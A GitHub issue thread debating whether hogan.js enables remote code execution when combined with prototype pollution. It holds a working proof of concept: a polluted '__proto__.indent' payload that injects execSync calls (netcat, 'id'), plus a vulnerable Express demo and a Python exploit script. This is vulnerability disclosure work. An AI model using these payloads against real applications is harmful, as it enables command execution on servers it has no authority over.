Harden against prototype pollution

[sayoojbkumar]

Hogan.js can be chained with prototype pollution to gain Remote Code Execution as Hogan.js objects can be easily controlled.

Description:

• This vulnerability is regarding https://github.com/twitter/hogan.js

• The function createPartials is called whenever '<' exists in tokens .In function createPartials code generated are getting concatenated and then evaluated later.

• When Prototype pollution bug exist in a application it could pollute certain variables in complier.js and hence the code generated can be controlled.In this case node.indent and context.prefix can be polluted and can be used to gain rce.

POC

var hogan = require("hogan.js");

// construct template string
var template = "my {{>example}} template.";

//Prototype Pollution
constructor.prototype.indent="console.log(\"));console.log(process.mainModule.require('child_process').execSync('nc 127.0.0.1 1337'))//\")";
constructor.prototype.prefix="abcd";

var tokens=hogan.scan(template)
console.log("tokens",tokens)

// compile template
var compiled = hogan.compile(template);

console.log("compiled" , compiled)
var s = compiled.render({example: 'twitterer' })
console.log("renderd",s)

To Reproduce
Steps to reproduce the behavior:

1. Run above poc.js
2. listen on port 1337

Screenshots

Additional context

For more information refer here
https://sayoojbkumar.me/blog/2021/12/15/PP-Hogan-js/

[sayrer]

Hello, I don't believe this is an RCE (Remote Code Execution).

These lines are local code, right?

//Prototype Pollution
constructor.prototype.indent="console.log(\"));console.log(process.mainModule.require('child_process').execSync('nc 127.0.0.1 1337'))//\")";
constructor.prototype.prefix="abcd";

If you could explain more, or link to the Handlebars / Pug issues, that would help.

[sayoojbkumar]

Hey @sayrer what you said it correct it just lead to RCE when there exist a prototype pollution something similar to
https://blog.p6.is/AST-Injection/

[sayrer]

I do not think it can lead to RCE (I also read that post). I did see this:

GHSA-q42p-pg8m-cqh6

but this was adjusting the constructor from the template itself, not lines of code above it (how do you execute those lines remotely?)

[sayoojbkumar]

Let say you have a application like this

const express = require('express');
var hogan = require("hogan.js");
const { unflatten } = require('flat');
const bodyParser = require('body-parser');
const app = express()
const port = 3000

app.use(bodyParser.json())
var template = "my {{>example}} template.";

app.get('/', (req, res) => {
    var compiled = hogan.compile(template);
    res.send(compiled.render({example: 'twitterer' }))
})

app.post('/prototype',(req,res)=> {
    console.log("yes")
    let object = unflatten(req.body);
    console.log(indent)
    res.json(object);
    
})

app.listen(port, () => {
  console.log(`Example app listening at http://localhost:${port}`)
})

package.json

{
  "name": "real_world",
  "version": "1.0.0",
  "description": "real world exploit",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "express": "^4.17.1",
    "hogan.js": "^3.0.2",
    "flat": "5.0.0"
  }
}

where "flat": "5.0.0" is vulnerable to Prototype Pollution

exploit.py

import requests
TARGET_URL = 'http://localhost:3000'
# make pollution
requests.post(TARGET_URL + '/prototype', json = {"__proto__.indent":"console.log(\"));console.log(process.mainModule.require('child_process').execSync('nc 127.0.0.1 1337'))//\")"})

In normally case Prototype Pollution wont make such effects but when it combines with Hogan.js this could lead to RCE.

[sayoojbkumar]

Prototype pollution is hard to completely eradicate. What's happening here is when Hogan.js combines with any other Prototype Pollution vulnerable library/piece of code it just allow attacker to gain RCE.

[sayrer]

I believe this analysis is flawed. The title says "leads to RCE", but the RCE is in the flat package. It is true that the RCE in flat can manipulate Hogan's prototype chain, but once there's an RCE, there are a lot of things the code can do.

[sayoojbkumar]

Well Flat is only vulnerable to prototype pollution and in normal case prototype pollution doesn't leads to RCE but prototype pollution are capable of pollution objects. In this case when prototype pollution combines with Hogan.js it leads to RCE by polluting indent

[sayoojbkumar]

Well @sayrer you interpreted this in wrong way. Looking into the example I shared when there is a post request to /pollution where it do unflatten(req.body) this alone cannot cause RCE even it's vulnerable to prototype pollution. Prototype pollution are only capable of polluting values in undefined object's well that doesn't leads to RCE.The impact of prototype pollution depends on the application.Depending on the exact logic of the application, prototype pollution can lead to remote code execution (RCE), here in this case With Hogan.js it leads to RCE by manipulating/pollution the objects in Hogan.js via prototype pollution.

The issue is something similar to these gadget chains examples where client side prototype pollution cause XSS when used with certain library https://github.com/BlackFan/client-side-prototype-pollution#script-gadgets

[sayrer]

Let say you have a application like this

I tried this example and I'm a little confused. I can see that there's an RCE in flat, in that it allows assignment to __proto__.indent.

I don't think this could be said to be an RCE in Hogan (it doesn't execute remote code, although it may execute local code put there by an RCE in another library).

I am willing to harden this, but it is not an RCE in Hogan, so I'm changing the title. This will be a breaking change, since I suppose someone out there could be relying on their ability to manipulate the prototype chain with their own code, although I doubt anyone does this in actively maintained code.

[sayrer]

The issue is something similar to these gadget chains examples where client side prototype pollution cause XSS when used with certain library https://github.com/BlackFan/client-side-prototype-pollution#script-gadgets

Not similar. Those libraries are vulnerable because of the way they themselves parse document.location. Hogan does no such thing, although the vulnerabilities in those libraries could be used to overwrite Hogan's code if they shared a global. Also, they could probably just overwrite all of Hogan in some cases--no need to resort to the prototype chain.

[sayoojbkumar]

Let say you have a application like this

I tried this example and I'm a little confused. I can see that there's an RCE in flat, in that it allows assignment to __proto__.indent.

I don't think this could be said to be an RCE in Hogan (it doesn't execute remote code, although it may execute local code put there by an RCE in another library).

I am willing to harden this, but it is not an RCE in Hogan, so I'm changing the title. This will be a breaking change, since I suppose someone out there could be relying on their ability to manipulate the prototype chain with their own code, although I doubt anyone does this in actively maintained code.

Once again RCE is not in flat. It's PP in flat library. Let's say if I just manipulate proto.indent in a code Which doesn't use Hogan.js will that cause RCE? PP just pollutes the object with value we supply that doesn't means the values we provided are executed in normal case

see this PP example will this cause RCE? it's just strings it's not even getting executed so Flat is not just the cause of RCE

this isn't executed in code but Hogan.js helps in executing this code.

internally when some pp vulnerable library pollutes __proto__.indent that polluted value gets into context.code which is generated code that gets executed by Hogan.js which is the cause of RCE.

Below is the code for function createPartial in Hogan.js where we have node.indent getting appended to context.code which is generated code by Hogan.js where this generated code gets executed by Hogan.js . So PP pollutes the value in node.indent as a string and then this polluted value gets appended to generated code by Hogan.js which gets executed and thus a attacker gets RCE.

function createPartial(node, context) {
    var prefix = "<" + (context.prefix || "");
    var sym = prefix + node.n + serialNo++;
    context.partials[sym] = {name: node.n, partials: {}};
    context.code += 't.b(t.rp("' +  esc(sym) + '",c,p,"' + (node.indent || '') + '"));';
    return sym;
  }

when prototype pollution happens with the POC that i provided generated code by Hogan.js looks like this which is executed by Hogan.js thus attacker gain RCE

t.b("my ");t.b(t.rp("<abcdexample0",c,p,"console.log("));console.log(process.mainModule.require('child_process').execSync('id').toString())//")"));t.b(" template.");

Yes I completely agree PP is needed for this to happen but you are miss interpreting that Flat is cause of RCE it's not. Flat helps in Prototype Pollution and that polluted code as a string is executed by Hogan.js which is the cause of RCE its like Hogan.js is chained by PP to get RCE.Still confused check this out some of other templating engines have this issue.

https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution#ast-prototype-pollution

PP just doesn't cause RCE the polluted value should be executed somehow right to get RCE and that's been done by Hogan.js by polluting node.indent.

PP - Prototype Pollution

[sayoojbkumar]

Its not like we have RCE at the first and then manipulate Hogan.js it's like we have PP and then chain with Hogan.js to gain RCE